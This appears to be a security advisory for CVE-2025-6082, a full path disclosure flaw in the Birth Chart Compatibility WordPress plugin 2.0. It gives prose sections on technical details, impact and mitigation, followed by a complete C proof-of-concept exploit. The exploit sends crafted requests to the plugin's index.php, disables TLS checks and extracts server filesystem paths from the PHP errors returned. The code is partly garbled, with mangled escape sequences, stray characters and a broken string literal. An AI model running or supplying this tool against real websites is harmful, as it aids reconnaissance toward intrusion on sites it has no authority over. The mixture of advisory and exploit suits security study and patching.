Overview
The Birth Chart Compatibility WordPress Plugin version 2.0 has been identified with a critical vulnerability, designated as CVE-2025-6082. This flaw allows for a full path disclosure, exposing sensitive file paths on the server. Such vulnerabilities can lead to significant security risks, as they can provide attackers with valuable information about the server’s structure and configuration.
Technical Details
This vulnerability occurs due to improper error handling within the plugin. When the plugin encounters an error, it discloses the full path of the script being executed. This is particularly concerning for web applications, as it can reveal directory structures, file locations, and possibly sensitive information related to other installed plugins or themes.
For instance, if an attacker sends a malformed request to the plugin, the server responds with an error message that includes the absolute path to the plugin files. This information can be leveraged to craft targeted attacks, such as exploiting other vulnerabilities or gaining unauthorized access to sensitive areas of the website.
Impact
The potential consequences of this vulnerability are severe. By exposing full path details, attackers can perform reconnaissance on the target server, increasing the likelihood of a successful exploit. This could lead to data breaches, unauthorized access to confidential information, or even complete server compromise. Websites using this plugin are at risk, particularly those that handle sensitive user data.
Mitigation
To protect against CVE-2025-6082, it is crucial for website administrators to update the Birth Chart Compatibility Plugin to the latest version, which includes patches for this vulnerability. Regularly updating plugins and themes is a best practice in cybersecurity, as it mitigates the risk of known vulnerabilities being exploited.
Additionally, implementing robust error handling and logging practices can help minimize the exposure of sensitive information. Security professionals should consider employing web application firewalls (WAFs) to filter out malicious traffic and enhance the overall security posture of their WordPress installations. Regular security audits and vulnerability assessments can further safeguard against potential exploits.
Proof of Concept (PoC)
/*
* Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-6082
* Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
* Description : ProofβofβConcept exploits the Full Path Disclosure bug in the
* βBirth Chart Compatibilityβ WordPress plugin (<=v2.0). It sends
* an HTTP GET request to the pluginβs index.php endpoint, captures
* the resulting PHP warning or fatal error, and parses the serverβs
* filesystem path (e.g. β/var/www/html/wp-content/plugins/β¦β or
* βC:\xampp\htdocs\β¦β). Revealing this path aids attackers in
* chaining further LFI/RCE or reconnaissance attacks.
*/
#include<stdio.h>
#include"argparse.h"
#include<string.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <unistd.h>
#define FULL 2300
const char *url = NULL;
const char *cookies=NULL;
int selecetCookie = 0;
int verbose = 0;
void exitSyscall()
{
__asm__ volatile
(
"xor %%rdi, %%rdint"
"mov $0x3C, %%raxnt"
"syscallnt"
:
:
:"rax", "rdi"
);
}
const char *keyFound[] =
{
"Warning:",
"Fatal error:",
"/var/www/",
"C:\xampp\"
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("e[1;31m[-] Failed to allocate memory!e[0mn");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '�';
return total;
}
void showPath(const char *targetUrl)
{
char full[FULL];
CURLcode curlCode;
struct Mem response = {NULL, 0};
CURL *curl = curl_easy_init();
if (curl == NULL)
{
exitSyscall();
}
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("==========================================e[0mn");
printf("[+] Cleaning Response...e[0mn");
printf("[+] Response Buffer : %se[0mn", response.buffer);
printf("[+] Response Len : %zue[0mn", response.len);
printf("==========================================e[0mn");
}
fflush(stdout);
if (curl)
{
snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
sleep(1);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("e[1;35m------------------------------------------[Verbose Curl]------------------------------------------e[0mn");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html");
h = curl_slist_append(h,
"Accept-Encoding: gzip");
h = curl_slist_append(h,
"Accept-Language: en-US,en");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
long httpCode = 0;
curlCode = curl_easy_perform(curl);
if (curlCode == CURLE_OK)
{
printf("---------------------------------------------------------------------------------------n");
printf("e[1;36m[+] Request sent successfullye[0mn");
printf("e[1;33m[+] Input Url : %se[0mn", targetUrl);
printf("e[1;33m[+] Full Format Url : %se[0mn",full);
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&httpCode);
int numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
if (httpCode >= 200 && httpCode < 300)
{
printf("[+] Http Code (200 < 300) !e[0mn");
printf("e[1;32m[+] Http Code : %lde[0mn", httpCode);
printf("e[1;35m====================================[Response]====================================e[0mn");
printf("%sn", response.buffer);
printf("e[1;32m[+] Response Len : %zue[0mn", response.len);
printf("e[1;35m===================================================================================e[0mnn");
for (int k = 0; k < numberKey; k++)
{
const char *found = strstr(response.buffer, keyFound[k]);
if (found)
{
printf("e[1;34m[+] Keyword found: %se[0mn", keyFound[k]);
printf("e[1;34m[+] Context: %.100se[0mn", found);
}
}
}
else
{
printf("e[1;31m[-] Http Code : %lde[0mn", httpCode);
printf("e[1;31m[-] Please Check Your input Path !e[0mn");
printf("e[1;31m[-] Or Connection in Tragte : (%s)e[0mn", targetUrl);
if (verbose)
{
printf("e[1;35m====================================[Response]====================================n");
printf("%sn", response.buffer);
printf("e[1;32m[+] Response Len : %zue[0mn", response.len);
printf("e[1;35m===================================================================================nn");
}
}
}
else
{
printf("e[1;31m[-] The request was not sent !e[0mn");
if (verbose)
{
printf("e[1;31m[-] Exit Syscall ...e[0mn");
}
printf("e[1;31m[-] Error : %sn", curl_easy_strerror(curlCode));
exitSyscall();
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char **argv)
{
printf
(
"e[1;91m"
"ββββββ ββββββββ ββββββββ n"
"β ββββββββββββββββββββββββ n"
"ββββββ ββββββββ ββββββββ n"
"e[1;97mt Byte Reapere[0mn"
);
printf("e[1;91m---------------------------------------------------------------------------------------e[0mn");
int loop = 0;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Target Url (Base Url)"),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_INTEGER('f',
"loop",
&loop,
"For loop (Request) (Ex : -f 10)"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("e[1;31m[-] Please Enter Target Url !e[0mn");
printf("e[1;31m[-] Ex : ./exploit -u https://target.come[0mn");
exitSyscall();
}
if (verbose)
{
verbose=1;
}
if (cookies)
{
selecetCookie = 1;
}
if (loop)
{
for (int o = 0; o < loop ; o++)
{
showPath(url);
}
}
showPath(url);
return 0;
}